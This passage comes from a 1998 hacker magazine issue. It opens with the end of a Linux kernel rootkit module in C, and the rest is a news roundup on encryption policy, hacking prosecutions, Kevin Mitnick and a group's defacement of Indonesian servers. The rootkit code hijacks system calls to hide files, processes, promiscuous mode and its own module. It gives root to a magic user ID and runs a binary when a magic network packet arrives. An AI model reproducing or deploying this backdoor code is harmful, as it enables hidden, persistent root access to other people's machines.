    return buf + 1;
}

/* 1 if the process with this pid carries the magic name, 0 otherwise */
int invisible(pid_t pid)
{
    struct task_struct *task = get_task(pid);
    char *buffer;
    int ret = 0;

    if (task) {
        buffer = kmalloc(200, GFP_KERNEL);
        if (buffer == NULL)
            return 0;
        memset(buffer, 0, 200);
        task_name(task, buffer);
        if (strstr(buffer, (char *) &mtroj))
            ret = 1;
        kfree(buffer);          /* freed on both paths (the original leaked it on a miss) */
    }
    return ret;
}

/*
 * New system calls
 */

/*
 * hide module symbols
 */
int n_get_kernel_syms(struct kernel_sym *table)
{
    struct kernel_sym *tb;
    int compt, compt2, compt3, i, done;

    compt = (*o_get_kernel_syms) (table);

    if (table != NULL) {
        tb = kmalloc(compt * sizeof(struct kernel_sym), GFP_KERNEL);
        if (tb == NULL)
            return compt;
        compt2 = 0;
        done = 0;
        i = 0;
        memcpy_fromfs((void *) tb, (void *) table, compt * sizeof(struct kernel_sym));
        while (!done) {
            /* an entry whose name starts with '#' opens a module's symbol block */
            if ((tb[compt2].name)[0] == '#')
                i = compt2;
            if (!strcmp(tb[compt2].name, mtroj)) {
                /* find the start of the next module's block ... */
                for (compt3 = i + 1; compt3 < compt && (tb[compt3].name)[0] != '#'; compt3++);
                /* ... and drop everything from our '#' marker up to it */
                if (compt3 != (compt - 1)) {
                    memmove((void *) &(tb[i]), (void *) &(tb[compt3]),
                            (compt - compt3) * sizeof(struct kernel_sym));
                    compt -= (compt3 - i);  /* the count shrinks by what was removed */
                } else
                    compt = i;
                done++;
            }
            compt2++;
            if (compt2 == compt)
                done++;
        }
        memcpy_tofs(table, tb, compt * sizeof(struct kernel_sym));
        kfree(tb);
    }
    return compt;
}

/*
 * how it works:
 * I need to allocate user memory. To do that, I'll do exactly as malloc() does
 * it (changing the break value).
 */
int my_execve(const char *filename, const char *argv[], const char *envp[])
{
    long __res;
    __asm__ volatile ("int $0x80":"=a" (__res):"0"(__NR_myexecve), "b"((long) (filename)),
                      "c"((long) (argv)), "d"((long) (envp)));
    return (int) __res;
}

int n_execve(const char *filename, const char *argv[], const char *envp[])
{
    char *test;
    int ret, tmp;
    char *truc = OLDEXEC;
    char *nouveau = NEWEXEC;
    unsigned long mmm;

    test = (char *) kmalloc(strlen(truc) + 2, GFP_KERNEL);
    if (test == NULL)
        return my_execve(filename, argv, envp);
    (void) strncpy_fromfs(test, filename, strlen(truc));
    test[strlen(truc)] = '\0';

    if (!strcmp(test, truc)) {
        kfree(test);
        /* grow the caller's data segment and drop the new path there, since
           the real execve wants its filename in user memory */
        mmm = current->mm->brk;
        ret = brk((void *) (mmm + 256));
        if (ret < 0)
            return ret;
        memcpy_tofs((void *) (mmm + 2), nouveau, strlen(nouveau) + 1);
        ret = my_execve((char *) (mmm + 2), argv, envp);
        tmp = brk((void *) mmm);
    } else {
        kfree(test);
        ret = my_execve(filename, argv, envp);
    }
    return ret;
}

/*
 * Trap the ioctl() system call to hide the PROMISC flag on ethernet interfaces.
 * If we reset the PROMISC flag when the trojan is already running, then it
 * won't hide it anymore (needed otherwise you'd just have to do an
 * "ifconfig eth0 +promisc" to find the trojan).
 */
int n_ioctl(int d, int request, unsigned long arg)
{
    int tmp;
    struct ifreq ifr;

    tmp = (*o_ioctl) (d, request, arg);
    if (request == SIOCGIFFLAGS && !promisc) {
        memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
        ifr.ifr_flags = ifr.ifr_flags & (~IFF_PROMISC);
        memcpy_tofs((struct ifreq *) arg, (struct ifreq *) &ifr, sizeof(struct ifreq));
    } else if (request == SIOCSIFFLAGS) {
        memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
        if (ifr.ifr_flags & IFF_PROMISC)
            promisc = 1;
        else if (!(ifr.ifr_flags & IFF_PROMISC))
            promisc = 0;
    }
    return tmp;
}

/*
 * trojan setuid() system call.
 */
int n_setuid(uid_t uid)
{
    int tmp;

    if (uid == MAGICUID) {
        current->uid = 0;
        current->euid = 0;
        current->gid = 0;
        current->egid = 0;
        return 0;
    }
    tmp = (*o_setuid) (uid);
    return tmp;
}

/*
 * trojan getdents() system call.
 */
int n_getdents(unsigned int fd, struct dirent *dirp, unsigned int count)
{
    int tmp, t, proc = 0, hidden;
    unsigned int n;
    struct inode *dinode;
    struct dirent *dirp2, *dirp3;

    tmp = (*o_getdents) (fd, dirp, count);
#ifdef __LINUX_DCACHE_H
    dinode = current->files->fd[fd]->f_dentry->d_inode;
#else
    dinode = current->files->fd[fd]->f_inode;
#endif
    /* is this the root of procfs? then numeric entries are pids to check */
    if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i_dev) == 1)
        proc = 1;
    if (tmp > 0) {
        dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);
        if (dirp2 == NULL)
            return tmp;
        memcpy_fromfs(dirp2, dirp, tmp);
        dirp3 = dirp2;
        t = tmp;
        while (t > 0) {
            n = dirp3->d_reclen;
            t -= n;
            hidden = 0;
            if ((strstr((char *) &(dirp3->d_name), (char *) &mtroj) != NULL)
                || (proc && invisible(myatoi(dirp3->d_name)))) {
                if (t != 0)
                    memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
                else
                    dirp3->d_off = 1024;
                tmp -= n;
                hidden = 1;
            }
            if (dirp3->d_reclen == 0) {
                /*
                 * workaround for some fs drivers that do not properly
                 * implement the getdents syscall.
                 */
                t = 0;
            }
            /* after a memmove the next record already sits at dirp3: do not skip it */
            if (t != 0 && !hidden)
                dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);
        }
        memcpy_tofs(dirp, dirp2, tmp);
        kfree(dirp2);
    }
    return tmp;
}

/*
 * Trojan socketcall system call
 * executes a given binary when a packet containing the magic word is received.
 * WARNING: THIS IS REALLY UNTESTED UGLY CODE. MAY CORRUPT YOUR SYSTEM.
 */
int n_socketcall(int call, unsigned long *args)
{
    int ret, ret2, compt, match;
    char *t = RECVEXEC;
    unsigned long *sargs = args;
    unsigned long a0, a1, mmm;
    void *buf;

    ret = (*o_socketcall) (call, args);
    if (ret == MAGICSIZE && call == SYS_RECVFROM) {
        a0 = get_user(sargs);        /* socket fd (unused) */
        a1 = get_user(sargs + 1);    /* user buffer holding the received packet */
        buf = kmalloc(ret + 1, GFP_KERNEL);
        if (buf == NULL)
            return ret;
        memcpy_fromfs(buf, (void *) a1, ret);
        /* the payload may contain NUL bytes: turn them into 1 so strstr() sees the
           whole packet, and terminate the copy so it cannot run past the buffer */
        for (compt = 0; compt < ret; compt++)
            if (((char *) (buf))[compt] == 0)
                ((char *) (buf))[compt] = 1;
        ((char *) buf)[ret] = '\0';
        match = (strstr(buf, mtroj) != NULL);
        kfree(buf);

        if (match) {
            ret2 = fork();
            if (ret2 == 0) {
                mmm = current->mm->brk;
                ret2 = brk((void *) (mmm + 256));
                memcpy_tofs((void *) (mmm + 2), (void *) t, strlen(t) + 1);
                /* Hope the execve has been successful, otherwise you'll have 2 copies of the
                   master process in the ps list :] */
                ret2 = my_execve((char *) (mmm + 2), NULL, NULL);
            }
        }
    }
    return ret;
}

/*
 * module initialization stuff.
 */
int init_module(void)
{
    /* module list cleaning */
    /* would need to make a clean search of the right register
     * in the function prologue, since gcc may not always put
     * struct module *mp in %ebx
     * Try %ebx, %edi, %ebp, well, every register actually :)
     */
    register struct module *mp asm("%ebx");

    *(char *) (mp->name) = 0;
    mp->size = 0;
    mp->ref = 0;
    /*
     * Make it unremovable
     */
    /* MOD_INC_USE_COUNT; */
    o_get_kernel_syms = sys_call_table[SYS_get_kernel_syms];
    sys_call_table[SYS_get_kernel_syms] = (void *) n_get_kernel_syms;

    o_getdents = sys_call_table[SYS_getdents];
    sys_call_table[SYS_getdents] = (void *) n_getdents;

    o_setuid = sys_call_table[SYS_setuid];
    sys_call_table[SYS_setuid] = (void *) n_setuid;

    /* look downwards from 164 for an unused slot to park the real execve in,
       so that my_execve() can reach it through int $0x80 */
    __NR_myexecve = 164;
    while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
        __NR_myexecve--;

    o_execve = sys_call_table[SYS_execve];

    if (__NR_myexecve != 0) {
        sys_call_table[__NR_myexecve] = o_execve;
        sys_call_table[SYS_execve] = (void *) n_execve;
    }

    promisc = 0;

    o_ioctl = sys_call_table[SYS_ioctl];
    sys_call_table[SYS_ioctl] = (void *) n_ioctl;

    o_socketcall = sys_call_table[SYS_socketcall];
    sys_call_table[SYS_socketcall] = (void *) n_socketcall;

    return 0;
}

void cleanup_module(void)
{
    sys_call_table[SYS_get_kernel_syms] = o_get_kernel_syms;
    sys_call_table[SYS_getdents] = o_getdents;
    sys_call_table[SYS_setuid] = o_setuid;
    sys_call_table[SYS_socketcall] = o_socketcall;
    if (__NR_myexecve != 0)
        sys_call_table[__NR_myexecve] = 0;
    sys_call_table[SYS_execve] = o_execve;
    sys_call_table[SYS_ioctl] = o_ioctl;
}
<-->

----[ EOF


---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 19 of 20 


----[ PHRACK WORLD NEWS

----[ Phrack World News - 52


New categorization:
    -[ Stories
    -[ Book Releases
    -[ Conventions
    -[ Other Headlines of Interest


----[ Issue 52


0x1: Hacker Acquitted & Iraq Computerises
0x2: The Impact of Encryption on Public Safety
0x3: Urban Ka0s -- 26 Indonesian Servers Haxed
0x4: Hacker accused of sabotaging Forbes computers
0x5: Privacy, Inc. Unveils its Internet Background Check
0x6: Commerce Dept encryption rules declared unconstitutional
0x7: The Million Dollar Challenge
0x8: High Profile Detainee Seeks Legal Help
0x9: Kevin Mitnick Press Release
0xa: SAFE crypto bill cracked again
0xb: RC5 Cracked - The unknown message is...
0xc: Kashpureff in custody.
0xd: XS4ALL refuses Internet tap
0xe: The FCC Wants V-Chip in PCs too

1x1: Book Title: Underground (review)
1x2: Book Title: The Electronic Privacy Papers
1x3: Book Title: "Computer Security and Privacy: An Information Sourcebook.."

2x0: Convention: <none>

3x1: Misc: Civil Liberties Groups ask FCC to Block FBI Proposal
3x2: Misc: Anti-Spam Bills in Congress
3x3: Misc: Justice Dept Charges Microsoft..
3x4: Misc: Small Minds Think Alike
3x5: Misc: Cyber Promotions tossed offline


0x1>
[submitted by: the wizard of id] 

Phrack, 

I thought that you guys may be able to make use of these articles which I 
found in my newspaper’s IT section. Perhaps you should pass them on to the 
editors of Phrack World News. 


<start article 1> 


Hacker Acquitted 


Extract from The Age, Victoria, Australia. -- Tuesday 11/25/97


The US Air Force failed last Friday to convince Woolwich Crown Court in
the UK that Matthew Bevan, 23, hacked into its secret files with his home
computer. Computer guru Bevan was cleared of all accusations, which led to
fears of US national security risk. He was charged with three offences of
"unauthorised access and modification" into sensitive research and
development files at New York's Griffiss Air Force Base and Lockheed Space
and Missile Company in California via the Internet.
<end article 1>


The article is accompanied by a very cool picture of Bevan in a black 
suit, wearing mirrored sunglasses. :) 


<start article 2> 


Iraq Computerises 


Extract from The Age, Victoria, Australia. -- Tuesday 11/25/97


To conceal its deadliest arms from U.N. weapons inspectors, Iraq increasingly
has turned to computers, including American brands sold to Baghdad since
the end of the 1991 Persian Gulf War in violation of international sanctions,
according to US officials and U.N. diplomats.

Iraq is using mostly Western-made computers for two critical functions: To
transfer data from bulky paper to small disks that they can easily
disperse, making the information difficult for U.N. weapons inspection
teams to track.

For research and development in all four categories of weapons Iraq has
been forbidden from keeping under terms of the U.N. resolution ending the
war - nuclear, chemical and biological weapons and long-range missiles.

Because of shifting tactics, computer specialists have become an ever more
important component of the weapons inspections teams, US and U.N. sources
say.

Their work often involves digging into hard drives and unearthing material
that was erased after being transferred to disks.


<end article 2> 


0x2>


[submitted by: Mike Kretsch] 


Statement of Louis J. Freeh, Director 
Federal Bureau of Investigation 


Before the Permanent Select Committee on 
Intelligence, United States House of Representatives 
Washington, D. C. 

September 9, 1997 


This man must be stopped. For other fun reading,
check out his statements about the FBI's International
Crime fighting efforts. Errrr. Wasn't international
supposed to be CIA and domestic FBI?


The Impact of Encryption 
on Public Safety 


Statement of Louis J. Freeh, Director 
Federal Bureau of Investigation 


Before the Permanent Select Committee on Intelligence 
United States House of Representatives 


Washington, D. C. 
September 9, 1997 


Mr. Chairman and members of the committee, I appreciate the opportunity to
discuss the issue of encryption and I applaud your willingness to deal with
this vital public safety issue.


The looming spectre of the widespread use of robust, virtually unbreakable 
encryption is one of the most difficult problems confronting law enforcement 
as the next century approaches. At stake are some of our most valuable and 
reliable investigative techniques, and the public safety of our citizens. 

We believe that unless a balanced approach to encryption is adopted that 
includes a viable key management infrastructure that supports immediate 
decryption capabilities for lawful purposes, our ability to investigate 

and sometimes prevent the most serious crimes and terrorism will be severely 
impaired. Our national security will also be jeopardized. 


For law enforcement, framing the issue is simple. In this time of dazzling 
telecommunications and computer technology where information can have 
extraordinary value, the ready availability of robust encryption is 
essential. No one in law enforcement disputes that. Clearly, in today’s 
world and more so in the future, the ability to encrypt both contemporaneous 
communications and stored data is a vital component of information security. 


As is so often the case, however, there is another aspect to the encryption 
issue that if left unaddressed will have severe public safety and national 
security ramifications. Law enforcement is in unanimous agreement that the 
widespread use of robust unbreakable encryption ultimately will devastate 
our ability to fight crime and prevent terrorism. Unbreakable encryption 
will allow drug lords, spies, terrorists and even violent gangs to 
communicate about their crimes and their conspiracies with impunity. We will
lose one of the few remaining vulnerabilities of the worst criminals and 
terrorists upon which law enforcement depends to successfully investigate 
and often prevent the worst crimes. 


For this reason, the law enforcement community is unanimous in calling for 

a balanced solution to this problem. Such a solution must satisfy both the 
commercial needs of industry for strong encryption and law enforcement’s 
public safety decryption needs. In our view, any legislative approach that 
does not achieve such a balanced approach seriously jeopardizes the 
long-term viability and usefulness of court-authorized access to transmitted 
as well as stored evidence and information. Electronic surveillance and 
search and seizure are techniques upon which law enforcement depends to 


ensure public safety and maintain national security. 


One such balanced solution to this problem is key recovery encryption. 
Under this approach, a decryption "key" for a given encryption product is 
deposited with a trustworthy key recovery agent for safe keeping. The key 
recovery agent could be a private company, a bank, or other commercial or 
government entity that meets established trustworthiness criteria. Should 
encryption users need access to their encrypted information, they could 
obtain the decryption key from the key recovery agent. Additionally, when 
law enforcement needs to decrypt criminal-related communications or computer 
files lawfully seized under established legal authorities, they too, under 
conditions prescribed by law and with the presentation of proper legal 
process, could obtain the decryption key from the key recovery agent. This 
is the only viable way to permit the timely decryption of lawfully seized 
communications or computer files that are in furtherance of criminal 
activity. 


The decryption key or information would be provided to the law enforcement 
agency under very strict controls and would be used only for its intended 
public safety purpose. Under this approach, the law-abiding would gain the 
benefits of strong, robust encryption products and services with emergency 
decryption capabilities and public safety and national security would be 
maintained--as manufacturers produce and sell encryption products that 
include features that allow for the immediate decryption of criminal-related 
encrypted communications or electronic information. 


This solution meets industry's information security and communications
privacy needs for strong encryption while addressing law enforcement's
public safety needs for immediate decryption when such products are used
to conceal crimes or impending acts of terrorism or espionage.


Some have argued that government policy makers should step aside and let 
market forces solely determine the direction of key recovery encryption, 
letting market forces determine the type of technologies that will be used 
and under what circumstances. They argue that most corporations that see 
the need for encryption will also recognize the need for, and even insist 
on, key recovery encryption products to secure their electronically stored 
information and to protect their corporate interests should an encryption 
key be lost, stolen or used by a rogue employee for extortion purposes.


We agree that rational thinking corporations will act in a prudent manner 
and will insist on using key recovery encryption for electronically stored 
information. However, law enforcement has a unique public safety requirement 
in the area of perishable communications which are in transit (telephone 
calls, e-mail, etc.). It is law enforcement, not corporations, that 

has a need for the immediate decryption of communications in transit. There 
is extraordinary risk in trusting public safety and national security to 
market forces that rightfully are protecting important but unrelated 
interests. Law enforcement’s needs will not be adequately addressed by 

this type of an approach. 


It is for this reason that government policy makers and Congress should 
play a direct role in shaping our national encryption policy and adopt a 
balanced approach that addresses both the commercial and the public safety 
needs. The adverse impact to public safety and national security associated 
with any type of "wait and see" or voluntary market force approach would 

be far too great of a price for the American public to pay. 


Several bills have recently been introduced which address encryption. 
Language in some of the proposed bills makes it unlawful to use encryption 
in the furtherance of criminal activity and set out procedures for law 
enforcement access to stored decryption keys in those instances where 

key recovery encryption was voluntarily used. Only one of these bills, 

S. 909, comes close to meeting our core public safety, effective law
enforcement, and national security needs. S. 909 takes significant strides
in the direction of protecting public safety by encouraging the use of key
recovery encryption through market based incentives and other inducements.
All of the other bills currently under consideration by the Congress, to
include S. 376, S. 377, and H.R. 695, would have a significant negative
impact on public safety and national security and would risk great harm
to our ability to enforce the laws and protect our citizens if enacted.


Unfortunately, S. 909 still does not contain sufficient assurances that 
the impact on public safety and effective law enforcement caused by the 
widespread availability of encryption will be adequately addressed. We look 
forward to working with you to develop legislative accommodations that 
adequately address the public safety needs of law enforcement and a balanced 
encryption policy. 


Further, some argue the encryption "Genie is out of the bottle," and that 
attempts to influence the future use of encryption are futile. I do not 
believe that to be the case. Strong encryption products that include 
decryption features for lawful purposes can, with government and industry 
support, become the standard for use in the global information 
infrastructure. 


No one contends that the adoption of a balanced encryption policy will 
prevent all criminals, spies and terrorists from gaining access to and 
using unbreakable encryption. But if we, as a nation, act responsibly 
and only build systems and encryption products that support and include 
appropriate decryption features, all facets of the public’s interest can 
be served. 


And as this committee knows, export controls on encryption products exist 
primarily to protect national security and foreign policy interests. 
However, law enforcement is more concerned about the significant and 
growing threat to public safety and effective law enforcement that would 
be caused by the proliferation and use within the United States of a 
communications infrastructure that supports the use of strong encryption 
products but that does not support law enforcement’s immediate decryption 
needs. Without question, such an infrastructure will be used by dangerous 
criminals and terrorists to conceal their illegal plans and activities 
from law enforcement, thus inhibiting our ability to enforce the laws 
and prevent terrorism. 


Congress has on many occasions accepted the premise that the use of 
electronic surveillance is a tool of utmost importance in terrorism cases 
and in many criminal investigations, especially those involving serious 
and violent crime, terrorism, espionage, organized crime, drug-trafficking, 
corruption and fraud. There have been numerous cases where law enforcement, 
through the use of electronic surveillance, has not only solved and 
successfully prosecuted serious crimes and dangerous criminals, but has 
also been able to prevent serious and life-threatening criminal acts. For 
example, terrorists in New York were plotting to bomb the United Nations 
building, the Lincoln and Holland tunnels, and 26 Federal Plaza as well as 
conduct assassinations of political figures. Court-authorized electronic 
surveillance enabled the FBI to disrupt the plot as explosives were being 
mixed. Ultimately, the evidence obtained was used to convict the 
conspirators. In another example, electronic surveillance was used to 
prevent and then convict two men who intended to kidnap, molest and then 
kill a male child. 


Most encryption products manufactured today do not contain features that 
provide for immediate law enforcement decryption. Widespread use of 
unbreakable encryption or communications infrastructure that supports the 
use of unbreakable encryption clearly will undermine law enforcement’s 
ability to effectively carry out its public safety mission and to combat 
dangerous criminals and terrorists. 


This is not a problem that will begin sometime in the future. Law 
enforcement is already encountering the harmful effects of encryption 
in many important investigations today. For example: 


* convicted spy Aldrich Ames was told by the Russian Intelligence 
  Service to encrypt computer file information that was to be passed 
  to them. 

* an international terrorist was plotting to blow up 11 U.S.-owned 
  commercial airliners in the Far East. His laptop computer, which was 
  seized during his arrest in Manila, contained encrypted files 
  concerning this terrorist plot. 

* a subject in a child pornography case used encryption in transmitting 
  obscene and pornographic images of children over the Internet. 

* a major international drug trafficking subject recently used a 
  telephone encryption device to frustrate court-approved electronic 
  surveillance. 


Requests for cryptographic support pertaining to electronic surveillance 
interceptions from FBI field offices and other law enforcement agencies 
have steadily risen over the past several years. For example, from 1995 
to 1996, there was a two-fold increase (from 5 to 12) in the number of 
instances where the FBI’s court-authorized electronic efforts were frustrated 
by the use of encryption products that did not allow for lawful law 
enforcement decryption. 


Over the last three (3) years, the FBI has also seen the number of 
computer-related cases utilizing encryption and/or password protection 
increase from 20 or two (2) percent of the cases involving electronically 
stored information to 140 or seven (7) percent. These included the use of 
56-bit data encryption standard (DES) and 128-bit "pretty good privacy" 
(PGP) encryption. 


Just as when the Congress so boldly addressed the digital telephony issue 
in 1994, the government and the nation are again at an historic crossroad 
on this issue. The Attorney General and the heads of federal law enforcement 
agencies as well as the presidents of several state and local law enforcement 
associations recently sent letters to every member of Congress urging the 
adoption of a balanced encryption policy. In addition, the International 
Association of Chiefs of Police, the National Sheriff’s Association and 
the National District Attorneys Association have all enacted resolutions 
supporting a balanced encryption policy and opposing any legislation that 
undercuts or falls short of such a balanced policy. 


If public policy makers act wisely, the safety of all Americans will be 
enhanced for decades to come. But if narrow interests prevail, then law 
enforcement will be unable to provide the level of protection that people 
in a democracy properly expect and deserve. 


Conclusion 


We are not asking that the magnificent advances in encryption technology 
be abandoned. We are the strongest proponents of robust, reliable encryption 
manufactured and sold by American companies all over the world. Our position 
is simple and, we believe, vital. Encryption is certainly a commercial 
interest of great importance to this great nation. But it’s not merely a 
commercial or business issue. To those of us charged with the protection of 
public safety and national security, encryption technology and its 
application in the information age--here at the dawn of the 21st century 
and thereafter--will become a matter of life and death in many instances 
which will directly impact on our safety and freedoms. Good and sound 
public policy decisions about encryption must be made now by the Congress 
and not be left to private enterprise. Legislation which carefully balances 
public safety and private enterprise must be established with respect to 
encryption. 


Would we allow a car to be driven with features which would evade and outrun 
police cars? Would we build houses or buildings which firefighters could not 
enter to save people? 


Most importantly, we are not advocating that the privacy rights or personal 
security of any person or enterprise be compromised or threatened. You can’t 
yell "fire" in a crowded theater. You can’t with impunity commit libel or 
slander. You can’t use common law honored privileges to commit crimes. 


In support of our position for a rational encryption policy which balances 
public safety with the right to secure communications, we rely on the Fourth 
Amendment to the Constitution. There the framers established a delicate 
balance between "the right of the people to be secure in their persons, 
houses, papers, and effects (today we might add personal computers, modems, 
data streams, discs, etc.) against unreasonable searches and seizures." 
Those precious rights, however, were balanced against the legitimate right 
and necessity of the police, acting through strict legal process, to gain 
access by lawful search and seizure to the conversations and stored evidence 
of criminals, spies and terrorists. 


The precepts and balance of the Fourth Amendment have not changed or altered. 
What has changed from the late eighteenth to the late twentieth century is 
technology and telecommunications well beyond the contemplation of the 
framers. 


The unchecked proliferation of unbreakable encryption will drastically 
change the balance of the Fourth Amendment in a way which would shock its 
original proponents. Police soon may be unable through legal process and 
with sufficient probable cause to conduct a reasonable and lawful search 
or seizure, because they cannot gain access to evidence being channeled or 
stored by criminals, terrorists and spies. Significantly, their lack of 
future access may be in part due to policy decisions about encryption made 
or not made by the United States. This would be a terrible upset of the 
balance so wisely set forth in the Fourth Amendment on December 15, 1791. 
I urge you to maintain that balance and allow your police departments, 
district attorneys, sheriffs and federal law enforcement authorities to 
continue to use their most effective techniques to fight crime and 
terrorism--techniques well understood and authorized by the framers and 
Congress for over two hundred years. 


I look forward to working with you on this matter and at this time would 
be pleased to answer any questions. 


0x3> 


Subject: Urban Ka0s -- 26 Indonesian Servers Haxed 


Greetings Phrack, 


Today, our group (Urban Ka0s) and several Portuguese hackers attacked 
several Indonesian servers, in order to defend East Timor rights! 


We are Portuguese Hackers Against Indonesian Tyranny. 


"Thix Site Was Haxed & Deleted by PHAiT. This attack is not 
against Indonesian people but against its government and their 
oppression towards the Republic of Timor. These actions were 
made to honour and remember all the 250 people killed in Dili 
on the 12 November 1991. 


As a result all sites belonging to Indonesia’s government were 
razed, the rest only had their webpages changed." 


East Timor, One People, One Nation 


"Whether it is in Tibet or Poland, the Baltics or the 
South Pacific, Africa or the Caribbean, it has been shown 
that force and repression can never totally suffocate the 
reasons underlying the existence of a people: pride in its 
own identity, capacity to preserve, without restriction, 
everything that identifies it as such, freedom to pass all 
this on to future generations, in brief, the right to manage 
its own destiny." 


Xanana Gusmão 
October 5, 1989 


Please inform all cyber citizens of this action. 


Our contact is at: 

-- Urban Ka0s -- 
http://urbankaos.org 

irc: PT-Net irc.urbankaos.org 


0x4> 


Title: Hacker accused of sabotaging Forbes computers 
Source: Infobeat News 
Author: unknown 
Date: unknown 


A former temporary computer technician at business publisher Forbes 
Inc has been charged with sabotage and causing a massive crash of the 
firm’s computer network, prosecutors said. According to the complaint 
filed in Manhattan Federal Court and unsealed Monday, George Mario 
Parente, 30, of Howard Beach in the borough of Queens was accused of 
hacking his way into the Forbes’ network in April from his home, 
using an unauthorized password. Prosecutors alleged he erased vital 
information including budgets and salary from Forbes’ computers 
because he was angry with the company after he was fired. 


0x5> 


Title: Privacy, Inc. Unveils its Internet Background Check 
Source: 
Author: unknown 
Date: August 1, 1997 


Aurora, Colorado 


Privacy, Inc. (www.privacyinc.com) today released its Internet Background 
Check, a utility that empowers users to determine if they are at risk from 
the plethora of databases that are being placed on the Internet. Searches 
quickly scan through hundreds of databases being placed on-line by state and 
local governments and law enforcement agencies in categories such as: 


* Registered Sex Offenders and Predators 
* Deadbeat Parents 
* Wanted Persons 
* Missing Persons 
* Arrest/Prison 


‘The Computer Is Never Wrong’ 


"Errors and risks of mistaken identity in this data are a key concern," says 
Edward Allburn, founder and president of Privacy, Inc. The recent flurry of 
activity by government and law enforcement agencies to distribute such 
volatile information on the Internet creates an environment that potentially 
places innocent people at risk, especially for mistaken identity. 


Advanced technology was incorporated into the development of the Internet 
Background Check with this risk in mind. This technology allows users to 
also search for names that look and/or sound similar to their own while still 
delivering highly focused results that standard Internet search engines 
(such as Yahoo! and Lycos) are incapable of producing. 


One More Tool 


The release provides one more tool for consumers to protect themselves in the 
Information Age. Additional resources provided by Privacy, Inc. include: 

* Consumer Privacy Guide 
* Government Database Guide 
* Government Dossier Service 
* David Sobel’s Legal FAQ 
* Privacy News Archive, updated weekly 




Guido, the Cyber-Bodyguard is another utility planned to be released in the 
coming months. Guido will interface with the Internet Background Check to 
automatically alert users via e-mail if/when their name appears in a new or 
updated database, in effect monitoring the Internet so users don’t have to. 


0x6> 


Title: Commerce Dept encryption rules declared unconstitutional 
Source: fight-censorship@vorlon.mit.edu 
Author: unknown 
Date: unknown 


A Federal judge in San Francisco ruled today that the Commerce 
Department’s export controls on encryption products violate the 
First Amendment’s guarantees of freedom of speech. 


In a 35-page decision, U.S. District Judge Marilyn Patel said the 
Clinton administration’s rules violate "the First Amendment on the 
grounds of prior restraint and are, therefore, unconstitutional." 
Patel reaffirmed her December 1996 decision against the State 
Department regulations, saying that the newer Commerce Department 
rules suffer from similar constitutional infirmities. 


Patel barred the government from "threatening, detaining, 
prosecuting, discouraging, or otherwise interfering with" anyone 
"who uses, discusses, or publishes or seeks to use, discuss or 
publish plaintiff’s encryption programs and related materials." 
Daniel Bernstein, now a math professor at the University of 
Illinois, filed the lawsuit with the help of the Electronic 
Frontier Foundation. 


Patel dismissed the State, Energy, and Justice departments and 
CIA as defendants. President Clinton transferred jurisdiction over 
encryption exports from the State to the Commerce department on 
December 30, 1996. 


The Justice Department seems likely to appeal the ruling to the 
Ninth Circuit, which could rule on the case in the near future. 


0x7> 


Title: The Million Dollar Challenge 
Source: unknown mail list 


Ultimate Privacy, the e-mail encryption program combining ease 
of use with unbreakability. 


Ultimate Privacy is serious cryptography. On the Links page we 
have links to other Internet sites that discuss One-Time Pad 
cryptography and why it is unbreakable when properly 
implemented. 


Nevertheless, should you wish to try, the first person to be able 
to discern the original message within a year (following the 
simple requirements of the Challenge) will actually receive the 
million dollar prize as specified in the Rules page. The prize 
is backed by the full faith and credit of Crypto-Logic 
Corporation and its insurers. 


You might be interested to know how the Challenge was done. We 
used a clean, non-network-connected computer. After installing 
Ultimate Privacy, one person alone entered the Challenge message 
and encrypted it. After making a copy of the encrypted message, 
we removed the hard disk from the computer and it was 
immediately transported to a vault for a year. 


Therefore, the original message is not known by Crypto-Logic 
Corporation staff (other than the first few characters for 
screening purposes), nor are there any clues to the original 
message on any media in our offices. 


0x8> 


Title: High Profile Detainee Seeks Legal Help 
Source: fight-censorship@vorlon.mit.edu 
Author: unknown 
Date: September 3, 1997 


Mr. Kevin Mitnick has been detained in Federal custody without 
bail on computer "hacking" allegations for over thirty months. 
Having no financial resources, Mr. Mitnick has been appointed 
counsel from the Federal Indigent Defense Panel. As such, Mr. 
Mitnick’s representation is limited; his attorney is not permitted 
to assist with civil actions, such as filing a Writ of Habeas 
Corpus. 


For the past two years, Mr. Mitnick has attempted to assist in his 
own defense by conducting legal research in the inmate law library 
at the Metropolitan Detention Center (hereinafter "MDC") in Los 
Angeles, California. Mr. Mitnick’s research includes reviewing 
court decisions for similar factual circumstances which have 
occurred in his case. MDC prison officials have been consistently 
hampering Mr. Mitnick’s efforts by denying him reasonable access 
to law library materials. Earlier this year, Mr. Mitnick’s lawyer 
submitted a formal request to Mr. Wayne Siefert, MDC Warden, 
seeking permission to allow his client access to the law library 
on the days set aside for inmates needing extra law library time. 
The Warden refused. 


In August 1995, Mr. Mitnick filed an administrative remedy request 
with the Bureau of Prisons complaining that MDC policy in 
connection with inmate access to law library materials does not 
comply with Federal rules and regulations. Specifically, the 
Warden established a policy for MDC inmates that detracts from 
Bureau of Prison’s policy codified in the Code of Federal 
Regulations. 


Briefly, Federal law requires the Warden to grant additional law 
library time to an inmate who has an "imminent court deadline". 
The MDC’s policy circumvents this law by erroneously interpreting 
the phrase "imminent court deadline" to include other factors, 
such as, whether an inmate exercises his right to assistance of 
counsel, or the type of imminent court deadline. 

For example, MDC policy does not consider detention (bail), 
motion, status conference, or sentencing hearings as imminent 
court deadlines for represented inmates. MDC officials use this 
policy as a tool to subject inmates to arbitrary and capricious 
treatment. It appears MDC policy in connection with inmate legal 
activities is inconsistent with Federal law and thereby affects 
the substantial rights of detainees which involve substantial 
liberty interests. 


In June 1997, Mr. Mitnick finally exhausted administrative 
remedies with the Bureau of Prisons. Mr. Mitnick’s only avenue of 
vindication is to seek judicial review in a Court of Law. Mr. 
Mitnick wishes to file a Writ of Habeas Corpus challenging his 
conditions of detention, and a motion to compel Federal 
authorities to follow their own rules and regulations. 


Mr. Mitnick is hoping to find someone with legal experience, such 
as an attorney or a law student willing to donate some time to 
this cause to insure fair treatment for everyone, and to allow 
detainees to effectively assist in their own defense without 
